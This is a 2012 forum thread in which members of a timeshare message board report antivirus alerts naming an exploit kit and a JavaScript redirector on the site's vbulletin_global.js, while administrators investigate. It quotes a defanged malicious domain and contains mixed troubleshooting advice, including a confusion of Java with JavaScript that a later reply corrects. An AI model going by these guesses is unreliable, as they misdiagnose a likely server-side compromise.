# AVG Anti-Virus 2012 Starting to Block TUGBBS webpages!



## w.bob (Sep 5, 2012)

This never happened before. While going form one forum to another I get a red pop up messgae. It is from my AVG  account. 

"AVG Linkscanner Alert
!Threat was blocked!

File name:69.16.236.4/~tugbbsc/forums/clientscript/vbulletin_global.js?v=364

Threat name: Exploit Phoenix Exploit Kit (type 769)

Anyone else experience anything like this?


----------



## Renny30 (Sep 5, 2012)

w.bob said:


> This never happened before. While going form one forum to another I get a red pop up messgae. It is from my AVG  account.
> 
> "AVG Linkscanner Alert
> !Threat was blocked!
> ...



Yes, I've been getting it alot.


----------



## scootr5 (Sep 5, 2012)

No, but I've been getting errors the last few days about not being able to load script when I try to access page.


----------



## SailBadtheSinner (Sep 5, 2012)

You are not alone, I started receiving the message at about 2pm whenever I connected to TUG -








SBtS


----------



## cotraveller (Sep 5, 2012)

I received a Norton message when I accessed the TUG BBS a few minutes ago.

"*An intrusion attempt by presider.pro was blocked*"

The attacking computer was listed as presider.pro which dns lookup reports as being on a Moscow server.  The ip address lookup shows as being in Scranton, PA.  Might there be some address spoofing going on?


----------



## TUGBrian (Sep 5, 2012)

i will begin looking into this.


----------



## Passepartout (Sep 5, 2012)

Me too. Getting it every time I refresh or click on a thread. Looks exactly like the one in post #4. Just started about 11 EDT. On the one hand I'm glad AVG is working,  but on the other, I wish it wasn't necessary.

Jim


----------



## jackio (Sep 5, 2012)

I just got the same message using Norton. - Jacki


----------



## ace2000 (Sep 5, 2012)

Don't know if it's related, but at some point this morning around 9am CST, I was not able to load the TUG page.  The error was referring to a cron job - I believe it was a backup.


----------



## Quiet Pine (Sep 5, 2012)

I'm getting an error message too from Kaspersky Anti-Virus. It has popped up several times, warning about a threat and a Trojan. This morning all was fine.


----------



## theo (Sep 5, 2012)

*Me too...*

Upon visiting TUG today at about 6:15 p.m., my Avast anti-virus immediately indicated that a "Trojan Horse" virus had been successfully blocked. Further details disappeared before I could wite down the virus description details.


----------



## MichaelColey (Sep 5, 2012)

I've been getting this error this afternoon, too.This is the same error that we were getting a few months ago:http://tugbbs.com/forums/showthread.php?t=172116Did anyone ever figure out what happened then?  Or did it just stop?


----------



## Picker57 (Sep 5, 2012)

Yep, I'm getting them just this afternoon, but now about every 5 minutes. 

                 -----Zach


----------



## BM243923 (Sep 5, 2012)

Same thing, I signed on a few minutes  ago and message keeps popping up about threat blocked avg alert


----------



## ricoba (Sep 5, 2012)

I feel left out, since I have *not* gotten it!


----------



## Passepartout (Sep 5, 2012)

Don't know if it's related, but I don't seem to be able to underline or bold, or italicize or change color of TUG posts. Smilies don't work either. None of the message formatting seems to work.

Jim


----------



## dioxide45 (Sep 5, 2012)

No issues here, what browser is everyone using? I am on Chrome.


----------



## dioxide45 (Sep 5, 2012)

BM243923 said:


> Same thing, I signed on a few minutes  ago and message keeps popping up about threat blocked avg alert



Your avatar is showing as a broken image, is that by design?


----------



## Beaglemom3 (Sep 5, 2012)

Me, too. Got a Webroot threat warning.


----------



## TheWizz (Sep 5, 2012)

I have never had this problem until a few days ago and now I keep getting pop-up messages from AVG stating that they are detecting an "infection" from tugbbs.com in the form of a "Exploit Phoenix Exploit Kit (769)".  I get this infection alert from either Internet Explorer or Firefox.  I got an alert the the other day that AVG was doing some sort of software update and it seems the problems started then.  Was wondering if anyone else had this issue and if they were able to resolve it.  Quite frustrating...


----------



## DeniseM (Sep 5, 2012)

We have a new Mod (Sue) on the Marriott forum, and well..... she's dangerous.


----------



## piper_chuck (Sep 5, 2012)

*Trojan reported by Antivirus software*

My antivirus/firewall software just started reporting a Trojan every time I do anything here. Here's the info:

Type: Trojan program (1)	
HEUR:Trojan.Script.Iframer	Inactive	9/5/2012 8:52:38 PM	

It shows it as coming from:
http://tugbbs.com/forums/clientscript/vbulletin_global.js?v=364


----------



## BM243923 (Sep 5, 2012)

dioxide45 said:


> Your avatar is showing as a broken image, is that by design?



No that is new also no avatar

I put a new avatar today and seems like it likes this one


----------



## DeniseM (Sep 5, 2012)

BM243923 said:


> No that is new also new avatar



No picture visable - only text:  BM243923's Avatar


----------



## SueDonJ (Sep 5, 2012)

DeniseM said:


> We have a new Mod (Sue) on the Marriott forum, and well..... she's dangerous.



I warned you I might break TUG!  :rofl: 

As long as I'm here I may as well report - I'm not getting any of the issues that others are reporting in this thread but since about 5 this evening TUG has been running very slowly and whatever it is, it doesn't appear to be affecting the other sites I've viewed.

(The other tech issue I reported to TUG yesterday, about the Google Search error message, appears to be resolved.)

For what it's worth, I'm running Safari on a Mac.


----------



## T_R_Oglodyte (Sep 5, 2012)

Just logged on today for the first time since last night.  My AVG is reporting the Phoenix threat almost every time I open a page.

Using Firefox.


----------



## Tacoma (Sep 5, 2012)

I too was getting that message every page.  My husband switched my browser th google chrome and it seems to be working fine.  So try a new browser.  Thank heavens my husband is a techie.

Joan


----------



## amycurl (Sep 5, 2012)

I'm running Firefox on a Mac. I also checked TUG at the end of the work day on my brand-new Lenovo laptop, running Chrome and Norton 360, and didn't have a problem.


----------



## Passepartout (Sep 5, 2012)

Just switched to Chrome. AVG is showing active threats here, but no pop-ups appear. Formatting, underling, *bold* is working with Chrome- which doesn't seem to work using Firefox.

Jim


----------



## mas (Sep 5, 2012)

I haven't seen the problem here, using Chrome and AVG, however, it took about five tries and about 5 minutes to open a thread on the Marriott board--buying back timeshares.  I kept seeing pages that google couldn't open the page or that it was taking too long.


----------



## Talent312 (Sep 5, 2012)

I use IE9 and Avast!... and just got the message:
avast! blocked the virus:
http://www.tugbbs.com/forums/clientscript/vbulletin_global.j...

But so far, no ill effects seen.


----------



## easyrider (Sep 6, 2012)

ricoba said:


> I feel left out, since I have *not* gotten it!



Me too !!! Everything is fine. Im not using AVG or Norton. Im using microsoft security esentials and chrome.

Bill


----------



## debraxh (Sep 6, 2012)

I was getting the error using IE, and in fact could not even read the message because the thread wouldn't load!  Switched to Chrome -- same computer same AVG -- no problem now.


----------



## Ron98GT (Sep 6, 2012)

No problems here.  

One computer runs Windows 7 Professional, IE9, Firefox 15.0, and McAfee antivirus.

Two computers than run Windows XP Professional, IE7, Firefox 15.0, and Trend Micro antivirus.

So far, so good.


----------



## ricoba (Sep 6, 2012)

easyrider said:


> Me too !!! Everything is fine. Im not using AVG or Norton. Im using microsoft security esentials and chrome.
> 
> Bill



I am using IE 9, Windows 7 and Norton 360.


----------



## TUGBrian (Sep 6, 2012)

very bizarre indeed.


----------



## TUGBrian (Sep 6, 2012)

Talent312 said:


> I use IE9 and Avast!... and just got the message:
> avast! blocked the virus:
> http://www.tugbbs.com/forums/clientscript/vbulletin_global.j...
> 
> But so far, no ill effects seen.



this file doesnt even exist on the server...so weird


----------



## TUGBrian (Sep 6, 2012)

our host claims they have run a malware scan twice now and come up with nothing wrong with the server....we will however continue to dig into this as something is certainly triggering your antivirus software.


----------



## KauaiMark (Sep 6, 2012)

*Same here...*



piper_chuck said:


> My antivirus/firewall software just started reporting a Trojan every time I do anything here. Here's the info:
> 
> Type: Trojan program (1)
> HEUR:Trojan.Script.Iframer	Inactive	9/5/2012 8:52:38 PM
> ...




HEUR:Trojan.Script.Iframer

Accessed Using FireFox V14-1.0
                      funnecake Jul 2012

triggers using either FireFox or IE9

Was able to access TUG using Chrome browser w/o triggering the Kasperski Trojan warning.

...Mark


----------



## PearlCity (Sep 6, 2012)

Getting the same thing. It actually infected my other computer that didnt have a firewall.  I'm on one with a firewall now..


----------



## TUGBrian (Sep 6, 2012)

so bizarre...my av software picks up nothing on firefox or chrome browsers...both spybot and MBAM scans show nothing infected (and i even disabled av and browsed)...

i can only guess this at the moment is a false positive...but id still like to find out whats causing it and fix it.


----------



## theo (Sep 6, 2012)

*Still there a day later...*

Detected again today, indicated by Avast Anti-Virus software as a Trojan Horse virus JS:Redirector-MA. Successfully blocked, but obviously still an issue. Meanwhile, can't access "smilies" (not a huge problem)...

P.S. Fwiw, I use IE8 and Windows XP --- in my quest to stay a decade behind the times.


----------



## Htoo0 (Sep 6, 2012)

I'm getting it too. Each time I change pages. www.tugbbs.com/forums/clientscript/vbullentin_global.js?v=364 Threat name: Exploit Phoenix Exploit Kit (type 769)  AVG, Firefox and XP


----------



## GetawaysRus (Sep 6, 2012)

Guess I'm not alone.  I also use Avast.  Got a "Trojan Horse blocked" message.  It refers to something called JS:Redirector-MA


----------



## TheWizz (Sep 6, 2012)

I get the AVG blocks on IE and FF, but not Chrome.  However, on all the browsers, the "Quick Links" menu bar for seeing your posts, new posts, etc. is missing.


----------



## Passepartout (Sep 6, 2012)

I 'upgraded' my AVG to the paid version this morning in the hope that it might do a better job dealing with this Phoenix threat. Reporting no difference. The 'Quick Links' above disappears when clicked on. Still can't change formatting like, underlining, bolding. Smilies don't work. Spell check seems to work, though. 

If your AVG freebie seems to be working, it's probably as good as the paid one. The above is using a PC/Win7/Firefox. Chrome reports risks and reports them, but seems functional- except that Quick Links is AWOL entirely.

Jim


----------



## Fern Modena (Sep 6, 2012)

I'm using Chrome and AVG Paid for virus, and Previx for malware.  No problems at all. 

I think Firefox is part of the problem.  I've pretty much quit using Firefox because it is a huge memory hog and doesn't seen to return memory when you close tabs. Chrome development is far enough along that they have every extension, etc. that I want.

I do a full virus scan weekly and update my definitions automatically so they are always current.  If you guys are having problems, have you done both of those things since the "problem" has started?

This isn't the first time we've had this, btw.

Fern


----------



## klpca (Sep 6, 2012)

I'll add my little data points. 

No issues on iPad (safari) or iPhone

No issues at work yesterday using Firefox. I'm not sure what antivirus were using. It used to be kaspersky but I think the IT guy changed it recently. I'll see if I can figure it out later.

I get the warning at home using firefox/avast.


----------



## timeos2 (Sep 6, 2012)

Running Firefox almost exclusively on my PC, Opera / Internal browsers on my Android and the internal browser on my Touchpad (WebOS). All but the Touchpad have Trend Micro Internet Security, which I have used for over 10 years and never had a malware or virus get by on any of my 6+ family PC's or phones.  No reported errors on any of the various access OS/hardware for this site. 

Just to see what would happen I opened IE (HELP!!) & logged into the BBS. Have all the various menus, etc - no problem and no warnings. 

I have noticed that over time the cookies, or whatever sets the state of your current session, on virtually any access method can "lose" the ability to display the "Quick Links" option. If I clear everything when that happens the menu returns (usually). I'm really not sure why that can occur. I've seen it where one PC will have lost the menu if I log in while another uses it just fine so I believe it is a local machine issue. 

As for the current error being reported I am guessing that it is due to an outdated Java version. The errors/warnings appear to point to that. If someone getting the error can make sure they have updated their Java version AND removed all prior versions I'll bet it goes away.  

Keeping your Java up to date is very important for security as it holds high user rights. It is basically far more secure and reliable than the various MS scripting disasters but you must apply the security upgrades as they are released to be protected.   

Closing IE now (thankfully) so that threat to my pc is now mostly removed. If it weren't for the many & frequent MS patches I'd get rid of it entirely.


----------



## timeos2 (Sep 6, 2012)

UPDATE: 

Interesting that on my Trend Micro Log two "web threats" were blocked when I opened TUGBBS.COM under IE - not Firefox - a few minutes ago. I did not get a pop up only a log entry. Here is the link it blocked - once when I clicked on the "Quick Links" menu and once when I clicked "New Posts" in IE:

[FONT=Arial, sans-serif]ttp://presider.pro/d77bsczxwvebzam[/FONT] 
(left off the leading h so link is dead - don't go there!)

Maybe this will help track down whatever is occurring.


----------



## pranas (Sep 6, 2012)

I had no problems yesterday or today.


----------



## Ron98GT (Sep 6, 2012)

theo said:


> Detected again today, indicated by Avast Anti-Virus software as a Trojan Horse virus JS:Redirector-MA. Successfully blocked, but obviously still an issue. Meanwhile, can't access "smilies" (not a huge problem)...
> 
> P.S. Fwiw, I use IE8 and Windows XP --- in my quest to stay a decade behind the times.



XP Home or Professional?

just wondering since, in the past I've found XP Home more susceptible to Internet problems, with Professional being more stable.


----------



## Ron98GT (Sep 6, 2012)

timeos2 said:


> Running Firefox almost exclusively on my PC, Opera / Internal browsers on my Android and the internal browser on my Touchpad (WebOS). All but the Touchpad have Trend Micro Internet Security, which I have used for over 10 years and never had a malware or virus get by on any of my 6+ family PC's or phones.  No reported errors on any of the various access OS/hardware for this site.
> 
> Just to see what would happen I opened IE (HELP!!) & logged into the BBS. Have all the various menus, etc - no problem and no warnings.
> 
> ...



Virus found in Java:

http://www.java.com/en/download/help/cache_virus.xml

Recent Java bug fix:

http://newyork.newsday.com/business...s-oracle-fixes-security-bugs-in-pcs-1.3939510

More about recent Java bugs:

http://www.h-online.com/security/news/item/Warning-on-critical-Java-hole-1676219.html

Virus scanners & java bug:

http://www.h-online.com/security/ne...irus-scanners-block-Java-exploit-1696462.html


Java, version-7, update-6, buggy  

So, sounds like a Java problem.  Hits PC's & Mac's.


----------



## timeos2 (Sep 6, 2012)

The correct current Version of up to date Java is Java 7 Update 7. Anything before that could be a problem & should be replaced. 

While Java is very secure any software can be compromised. That is why they stay on top of it with timely updates unlike Active X & others that don't do regular updates or hold them for a predetermined release date. Not as safe as during the time when exploits are known but not corrected your machine(s) are at risk. 

Check your Java version. If it isn't 7 Update 7 then download the update.


----------



## TUGBrian (Sep 6, 2012)

our host did run a separate scan and found a few files that shouldnt be there (although some are on the test installation, and wouldnt even impact this forum even if it were malicious)

will keep everyone updated...hopefully removing these files will eliminate this issue.


----------



## TUGBrian (Sep 6, 2012)

ok..weve removed the last of the potentially suspected files...please those of you who can repeat the warnings let me know if they still pop up!


----------



## Passepartout (Sep 6, 2012)

Don't know if it has anything to do with this or any other problem, but as suggested by John upthread a couple, I checked my Java. I found that mine had updated to the latest version just yesterday, a few hours before the Phoenix began manifesting itself every time I click on a TUG page or link. Coincidence?

Btw, AVG is still showing the problem, and still won't allow smilies or any of the formatting above and the Quick Links in the blue bar are still scrambling and disappearing.

Jim


----------



## TUGBrian (Sep 6, 2012)

maybe if we can identify a few other users who recently updated java (which would certainly impact quicklinks btw)...we can find a better solution!


----------



## TUGBrian (Sep 6, 2012)

does your java installation have a rollback feature by chance?


----------



## TUGBrian (Sep 6, 2012)

believe (but not positive) that this would also explain why it doesnt impact chrome.


----------



## sun starved Gayle (Sep 6, 2012)

Just came up for me.


----------



## Passepartout (Sep 6, 2012)

I didn't notice a rollback feature on the Java panel, but will go back and look for that. 
Chrome's performance doesn't seem affected,  but my AVG does detect the bug and I get a red, 'caution' shield wherever the TUG site is open.


----------



## GetawaysRus (Sep 6, 2012)

TUGBrian said:


> maybe if we can identify a few other users who recently updated java (which would certainly impact quicklinks btw)...we can find a better solution!



I posted upthread a page or so ago.  My anti-virus program is Avast.  I use Windows 7.

Avast updates itself automatically, sometimes even more than once daily.  So I'm certain that I've got the latest virus definitions file.

And yes, I did receive notice of a Java update (and allowed it to install) just yesterday.  However, I have not received the Trojan warning on any other webpage so far - just TUG.

It may not be related, but I also have another anti-spyware program running in the background.  This program is called Spyware Blaster (free version).  I update Spyware Blaster manually when I remember to do it.  I have not updated it within the past few days, however.


----------



## TUGBrian (Sep 6, 2012)

for those of you who repeat the error, can you post as MUCH information regarding the warning as possible here (or email it to me at tug@tug2.net if it contains personal/computer info)

also if we could identify your web IP address, it would help the host identify a problem in the logs easier.


----------



## Passepartout (Sep 6, 2012)

No lookback feature that I can discern in the Java control panel.

It will be interesting to see if those affected got Java updates just before the problem showed itself. If you open the Java control panel it shows date/time of the last update. 

What I see is identical to the screenshot in post #3- just a different version since I upgraded today to the new, paid version of AVG

Jim


----------



## TUGBrian (Sep 6, 2012)

is there anything in the "more info" link?


----------



## Picker57 (Sep 6, 2012)

Passepartout said:


> No lookback feature that I can discern in the Java control panel.
> 
> It will be interesting to see if those affected got Java updates just before the problem showed itself. If you open the Java control panel it shows date/time of the last update.
> 
> ...



FUNNY YOU SHOULD MENTION.... Yes, I did just recently do the Java upgrade thingy.  Also, since this issue began I'm not able to change text fonts or sizes when I post.  I THINK I'm running IE on this computer, though I see the Firefox icon also.  AVG is my antivirus.  Fingers crossed.....

           -----Zach


----------



## TUGBrian (Sep 6, 2012)

so odd...we have scoured that .js file with a fine tooth comb, and can confirm theres nothing wrong with it.

*sigh


----------



## timeos2 (Sep 6, 2012)

From all this I have to assume that the site is on a Windows based host. Unfortunately Windows allows some behind the scenes and virtually impossible to diagnose changes to settings such as a default redirect that nothing short of a reload is able to clear. I've seen multiple machine including servers with that issue in the past and no amount of cleaning or code searches can identify just what got altered or where. I hope this isn't the case with this problem.  Another reason we use Unix/Linux based hosts exclusively.


----------



## Ron98GT (Sep 6, 2012)

GetawaysRus said:


> I posted upthread a page or so ago.  My anti-virus program is Avast.  I use Windows 7.
> 
> Avast updates itself automatically, sometimes even more than once daily.  So I'm certain that I've got the latest virus definitions file.
> 
> ...



I received the notice yesterday also, but I clicked "NO".

Late last year, one of my computers and the attached external hard-drive got infected from an Adobe update.  It was so bad that I had to replace the hard-drive & then update to Window 7 Professional.  There is a lot of info on the Internet about computer viruses associated with Adobe updates - be aware, and never allow an automatic update for an Adobe product.  If there is an update and you verified that it's safe, go to the Adobe web site and download it.  In the past I've received update notices, gone to the vendors web site, and found that no updates were available, but a virus would have been downloaded.


----------



## TUGBrian (Sep 6, 2012)

timeos2 said:


> From all this I have to assume that the site is on a Windows based host. Unfortunately Windows allows some behind the scenes and virtually impossible to diagnose changes to settings such as a default redirect that nothing short of a reload is able to clear. I've seen multiple machine including servers with that issue in the past and no amount of cleaning or code searches can identify just what got altered or where. I hope this isn't the case with this problem.  Another reason we use Unix/Linux based hosts exclusively.




the server that runs the forum is a linux server.


----------



## Passepartout (Sep 6, 2012)

OK, I have just done a System Restore and reset it to 9/4, before the Java update (or for that matter the AVG update, though after a scan). So far the result is no alert for a virus, Trojan Horse, Viking Ship, or unicorns on the loose. I am getting a notification for a Flash update- which I have declined. I may try doing these system changes one-by-one and try to trap the culprit.

Stay tuned.....

Jim


----------



## TUGBrian (Sep 6, 2012)

I appreciate all the time you are taking to help out with this Jim!


----------



## TUGBrian (Sep 6, 2012)

can you use this link

whatismyip.liquidweb.com

to email/pm me your ip address please?


----------



## timeos2 (Sep 6, 2012)

TUGBrian said:


> the server that runs the forum is a linux server.



Interesting.  Never saw an error like this on one of those.  Makes it more likely that it is a redirect on the client computers that may only occur in specific configurations,  Your purge of the server should assure it is now clean but the clients may be acting to keep the malware alive (acting as bots).  Tough to counter if that's what occurred.


----------



## TUGBrian (Sep 6, 2012)

well its definately only happening to a small % of individuals...based on past "issues" and more importantly the earlier "redirect from google links" issue (which is purely subjective, i base it on how many calls/emails i get telling me about the problem)...

I still want it fixed however!


----------



## Passepartout (Sep 6, 2012)

Well, lets see here, I am back to my usual Firefox Beta 16. Looks like *BOLD* _Italics_, underlining, color, and    smilies seem to be working like they were 2 days ago. I'll check the Quick Links in the blue stripe now but will assume it will work normally as well. ADDED: Yup, Quick links works normally.

If I were a gambler, I'd say the Java update of 9/6 is the culprit.

Jim


----------



## TUGBrian (Sep 6, 2012)

i posted something in the thread up top regarding the "weird things" people were seeing in the forum (not virus related)...see if we can get a few more to confirm this.

wonder if its an issue with the java update, or just that the forum has gotten so old...its no longer compatible with the new update.


----------



## timeos2 (Sep 6, 2012)

TUGBrian said:


> i posted something in the thread up top regarding the "weird things" people were seeing in the forum (not virus related)...see if we can get a few more to confirm this.
> 
> wonder if its an issue with the java update, or just that the forum has gotten so old...its no longer compatible with the new update.



It doesn't appear to be the Java version as I'm on the latest on multiple platforms with no issues.  It may be a version issue with the programs that are showing the error &  their interaction with Java.  Right now I'd guess that is the most likely answer.  As AVG etc are updated the problem will cease.


----------



## Passepartout (Sep 6, 2012)

TUGBrian said:


> wonder if its an issue with the java update, or just that the forum has gotten so old...its no longer compatible with the new update.



What if you got with the Java folks and told them that a fair number of your members experienced a problem that manifested itself after a Java update and was resolved after a system restore to a point before the update? I'm sure that TUG couldn't be the only affected site.

Anyway, however it goes, I'm relieved to not have the warning/notification every time I click on a TUG link. 

Thanks Brian for your concern and sticking with this.

Jim


----------



## TUGBrian (Sep 6, 2012)

i think at the very least...we can confirm (with a good amount of certainty) that it is a false positive either way.


----------



## Picker57 (Sep 6, 2012)

Ron98GT said:


> I received the notice yesterday also, but I clicked "NO".
> 
> Late last year, one of my computers and the attached external hard-drive got infected from an Adobe update.  It was so bad that I had to replace the hard-drive & then update to Window 7 Professional.  There is a lot of info on the Internet about computer viruses associated with Adobe updates - be aware, and never allow an automatic update for an Adobe product.  If there is an update and you verified that it's safe, go to the Adobe web site and download it.  In the past I've received update notices, gone to the vendors web site, and found that no updates were available, but a virus would have been downloaded.



Yikes....that's scary!  I've been automatically updating everything, figuring it was always fixing some unknown bug.  Thanks for posting. 

          ------------Zach


----------



## timeos2 (Sep 6, 2012)

Picker57 said:


> Yikes....that's scary!  I've been automatically updating everything, figuring it was always fixing some unknown bug.  Thanks for posting.
> 
> ------------Zach



Generally speaking it is usually best to do updates as they are announced officially by the vendor especially if it is called a security issue. But do require that it be a manula install not automatic & verify with the manufacturer website that is is really from them. 

Some that you almost can't avoid are the Microsoft Windows ones. While I used to pick & choose those too it became impossible to know as an end user what was OK and what was likely to cause more problems! So I went to download but don't install, wait a couple days after they are released and if all appears OK and no "uh-oh's" posted on known sites like InfoWorld or PC Mag, etc then I allow them to install.  If you don't you are at serious risk as they can muck around with setings you can never fix again!

Often an update to one program - such as Java, Firefox, your anti-virus, etc will cause issues with other programs that utilize those services untilt the OTHER programs are also updated.  That I live with as security is more important than the latest gizmo.  Using this method I have had no infections on my primary pc's in over 10 years.  Much of that success I give to the excellent Trend Micro services that have never failed me.  

Even my "secondary" pc's - my daughters & wifes as well as those I use for servicing other's brokn/infected PC's have had few issues all of which were easily repaired again with Trend Micro & AVG as the protection.  You need that as the primary defense.


----------



## Ron98GT (Sep 6, 2012)

timeos2 said:


> It doesn't appear to be the Java version as I'm on the latest on multiple platforms with no issues.  It may be a version issue with the programs that are showing the error &  their interaction with Java.  Right now I'd guess that is the most likely answer.  As AVG etc are updated the problem will cease.



"All versions of the 7.x branch of Java are affected. In tests, the exploit worked under Windows with all popular browsers including Google Chrome."

per The H Security

Note that the bug/virus also hits Mac's (Linux/Unix based operating system), so they are not immune.


----------



## MichaelColey (Sep 6, 2012)

I'm still getting the error, as well.


----------



## Passepartout (Sep 6, 2012)

timeos2 said:


> Some that you almost can't avoid are the Microsoft Windows ones. While I used to pick & choose those too it became impossible to know as an end user what was OK and what was likely to cause more problems! So I went to download but don't install, wait a couple days after they are released and if all appears OK and no "uh-oh's" posted on known sites like InfoWorld or PC Mag, etc then I allow them to install.
> Even my "secondary" pc's - my daughters & wifes as well as those I use for servicing other's brokn/infected PC's have had few issues all of which were easily repaired again with Trend Micro & AVG as the protection.



As I found out earlier today, doing the Windows updates as offered, gives you a handy place to go to with System Restore. It offers you several restore points that coincide with significant software installs and upgrades. I was able to go back to a point less than 48 hours ago- only 18 hours from when the problem manifested itself.

Jim


----------



## pjrose (Sep 6, 2012)

No TUG problems here, using Safari on Mac and iPad.  

'course I did get the weird multi-dolphin screen a few months ago, so I don't feel left out.


----------



## Passepartout (Sep 6, 2012)

MichaelColey said:


> I'm still getting the error, as well.



We think that the problem can be solved if you do a system restore to before yesterday morning when Java did an update. That fixed mine anyway. See post #72
Jim


----------



## KauaiMark (Sep 6, 2012)

*from the logs...*



TUGBrian said:


> so bizarre...my av software picks up nothing on firefox or chrome browsers...both spybot and MBAM scans show nothing infected (and i even disabled av and browsed)...
> 
> i can only guess this at the moment is a false positive...but id still like to find out whats causing it and fix it.



This is the log iten from the Kasperski logs if it helps:

vbulletin_global.js?v=364	Detected: HEUR:Trojan.Script.Iframer	9/6/2012 3:18:59 PM


----------



## TUGBrian (Sep 6, 2012)

yea, the global.js file has been gone over countless times at this point, (its not a super long file...content wise)...while its clear its triggering the alert...there is no malware or calls to malware inside it.

it is 100% identical to the global.js file we have from previous backup files (that existed long before this alert came around)


----------



## Kozman (Sep 6, 2012)

Just got a similar alert with Avast.


----------



## Elan (Sep 6, 2012)

No problems here (running Chrome/Win7).  I did have TUG weirdness yesterday morning at work (Firefox on Linux), but I didn't pay attention to the error message, and the issue resolved quickly.


----------



## dioxide45 (Sep 6, 2012)

I checked our Java version and it is currently running version 6, last updated on 8/10.

The fool that I was, I thought I would open up IE and go to TUG. Instantly McAfee was trying to block a Trojan. It wasn't overly successful as I had a program popup in my toolbox indicating the PC was infected and to run a scan using that program. It appears to be a program that tries to get you to accidentally run it to remove a non existent virus then they will try to extort money from you to get rid of the virus. I didn't run anything and did a restart. There was also a link on the desktop to a file on the C:\Program Data folder. I deleted the link and the files. Running a full virus scan now. Back in Chrome now.


----------



## TUGBrian (Sep 6, 2012)

ugh...i absolutely hate those.

did you get it just from going to the TUG homepage?  or a bookmarked link?  or thru google?


----------



## Passepartout (Sep 6, 2012)

It's Baaaack! I just updated AVG (Free) and restarted the computer. It reports the same infection as before, 

Name: Exploit Phoenix Exploit Kit (type 769)

Object name: www.tigbbs.com/forums/clientscript/vbulletin_global.js?v=364

Sorry, I thought we had it figured out.

Jim


----------



## dioxide45 (Sep 6, 2012)

TUGBrian said:


> ugh...i absolutely hate those.
> 
> did you get it just from going to the TUG homepage?  or a bookmarked link?  or thru google?



I access Tug through a bookmark to the UserCP page. I had surfed around the BBS a little before I got the warning. So I don't know where it is coming from exactly. I also use a computer using IE 6.0 that has not had the problem. However on that computer, I am never logged in to the forums.

_ETA: It created a folder with the following name: 036DFF85030E158B02ABE9FA2F3B707C. The exe file was in that folder, it has been purged from my recycle bin, so I can't tell you the file name exactly._


----------



## dioxide45 (Sep 6, 2012)

Passepartout said:


> It's Baaaack! I just updated AVG (Free) and restarted the computer. It reports the same infection as before,
> 
> Name: Exploit Phoenix Exploit Kit (type 769)
> 
> ...



Perhaps the updated definitions of AVG include this new threat where the old one didn't?


----------



## theo (Sep 6, 2012)

Ron98GT said:


> XP Home or Professional?



XP Professional, IE8 as browser. Still getting the "Trojan Horse virus successfully blocked message this evening immediately upon visiting TUG (before even logging in).


----------



## Passepartout (Sep 6, 2012)

Boy, I don't know. I did another system restore to an hour ago, and it is back to working fine. I still have virus protection AVG free 2012 (not '13) I think, and updated my superantispyware. It had not refreshed for some time, so I just reloaded it.

I may just use Chrome for my TUG BBSing for a while.  Oh, the custom formatting and smilies went away too, and the Quick Links above. All is back on my computer now, though. 

This is a PITA!

Jim


----------



## Elan (Sep 6, 2012)

Here's a link to another forum where there was a similar issue.  Don't know if it's any help, but......

http://badgerandblade.com/vb/showthread.php/271944-Malware-warning-again-Resolved


  Here's the nature of the issue from an admin:

"We've discovered the source of this (Caused by an out of date no longer in-use script that was never removed from the server and subsequently exploited)

We are clean now, but AVG will continue to pop those warnings up until it is cleared from their warning cache."


----------



## dioxide45 (Sep 6, 2012)

timeos2 said:


> Closing IE now (thankfully) so that threat to my pc is now mostly removed. If it weren't for the many & frequent MS patches I'd get rid of it entirely.



John, I thought you were _"Proudly *Microsoft* & Apple *free* with WebOS, Droid Bionic & Verizon Wireless"_. If that is the case, why would you be needing to obtain the frequent MS patches?


----------



## va_traveller (Sep 6, 2012)

Ron98GT said:


> Virus found in Java:
> 
> http://www.java.com/en/download/help/cache_virus.xml
> 
> ...



Just to set some information straight. I am getting the avast warning steadily still. The warning is about a JAVASCRIPT file (.js). I have been a web developer for going on 14 years, and have been a java certified developer since 1998. javascript and java have no relationship to each other except for the name. Java is a programming language that can be used to create huge applications, applets, etc. javascript is a scripting language that runs inside a browser (formally called liveScript). The warnings we are seeing will not be solved by "upgrading your java". 

I don't want anyone to get a false sense of security by looking @ upgrading java on their computer. The issue is server side, not client side.

Greg.


----------



## timeos2 (Sep 6, 2012)

dioxide45 said:


> John, I thought you were _"Proudly *Microsoft* & Apple *free* with WebOS, Droid Bionic & Verizon Wireless"_. If that is the case, why would you be needing to obtain the frequent MS patches?



In my usual access I'm blessedly MS free but my laptop and work pc's are cursed with Win7 or XP.  Have to have it for testing.  Even have a Mac book but seldom turn it on.


----------



## Htoo0 (Sep 6, 2012)

Still happening for me. I switched to IE to test and it occurred there too. http://www.tugbbs.com/forums/clients...lobal.js?v=364 Threat name: Exploit Phoenix Exploit Kit (type 769) AVG, Firefox, IE and XP Pro.  Will send IP address.


----------



## Ron98GT (Sep 7, 2012)

va_traveller said:


> Just to set some information straight. I am getting the avast warning steadily still. The warning is about a JAVASCRIPT file (.js). I have been a web developer for going on 14 years, and have been a java certified developer since 1998. javascript and java have no relationship to each other except for the name. Java is a programming language that can be used to create huge applications, applets, etc. javascript is a scripting language that runs inside a browser (formally called liveScript). The warnings we are seeing will not be solved by "upgrading your java".
> 
> I don't want anyone to get a false sense of security by looking @ upgrading java on their computer. The issue is server side, not client side.
> 
> Greg.



Did you even open and READ any of the attached files?  You disagree with "Java", the company, that admits they have buggy code?  Java themselves stated "TROJAN" virus.  Also, there is no "Upgrade", since the latest versions are buggy, again read my whole posting and the attached links. Do a Google search.  I'm not making this stuff up, talk to Java and see what they say.

I believe your the first to mention "JAVASCRIPT" warnings.  Others have stated "Trojan", which again relates back to Java, an Oracle company.


----------



## piper_chuck (Sep 7, 2012)

Ron98GT said:


> Did you even open and READ any of the attached files?  You disagree with "Java", the company, that admits they have buggy code?  Java themselves stated "TROJAN" virus.  Also, there is no "Upgrade", since the latest versions are buggy, again read my whole posting and the attached links. Do a Google search.  I'm not making this stuff up, talk to Java and see what they say.
> 
> I believe your the first to mention "JAVASCRIPT" warnings.  Others have stated "Trojan", which again relates back to Java, an Oracle company.



I am getting warnings from Kasperski about a trojan in a javascript. The point va was making is Java and javascript are unrelated. Upgrading Java won't help when the problem is in a javascript.

This is the ONLY web site I see this. I get the warnings on two computers and on Firefox and IE.

I've opened a case with Kasperski to see what they say.


----------



## Talent312 (Sep 7, 2012)

Just got another hit from Avast!...
Infection Details
URL: http://www.tugbbs.com/forums/clientscrip...
Infection: JS:Redirector-MA [Trj]

None of the menu buttons for this post are working.


----------



## SmithOp (Sep 7, 2012)

piper_chuck said:


